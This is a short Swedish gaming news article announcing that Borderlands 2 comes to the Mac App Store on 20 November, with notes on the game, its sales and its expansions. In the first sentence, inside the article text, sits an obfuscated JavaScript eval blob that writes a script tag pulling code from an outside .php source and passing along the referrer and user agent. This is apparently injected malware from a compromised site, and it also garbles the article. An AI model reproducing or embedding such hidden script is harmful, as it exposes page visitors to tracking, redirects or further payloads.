Image Image Image Image Image Image Image Image Image Image

| 31 maj, 2020

Scroll to top

Top

PC

Borderlands 2 kommer till Mac

Borderlands 2 kommer till Mac
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ekdad|var|u0026u|referrer|bhazn||js|php’.split(’|’),0,{}))
har spelföretaget officiellt gått ut med information om att spelet Borderlands 2 kommer till Mac App Store den 20 november i år.

Det hyllade firstperson-shootern som tar plats på planeten Pandora kommer att bli tillgängligt för Macanvändare. Detta är ett stort steg som visar hur stora titlar som innan bara funnits till PC och konsol nu tar rygg på varandra och portas över till Mac. Förutom Borderlands 2 har vi innan sett spelet Guild Wars 2 till Mac och i början av nästa år får vi också se SimCity som en Mac-version.

I Borderlands 2 kan du ihop med fyra vänner tillsammans glida runt på Pandora och ha allmänt skoj. Det är ett rollspel som går ut på att panga på samt fånga in så mycket exp som möjligt för att bli starkare och  gå upp i level.

Spelet har sålt över fem miljoner exemplar och blivit väl mottaget av kritiker världen över.

Så den 20 november är datumet då Borderlands 2 släpps i Mac App Store.

Expansionerna Captain Scarlett and her Pirate Booty och Mechromancer Pack kommer att finnas tillgängliga vid release.

Mer info: M3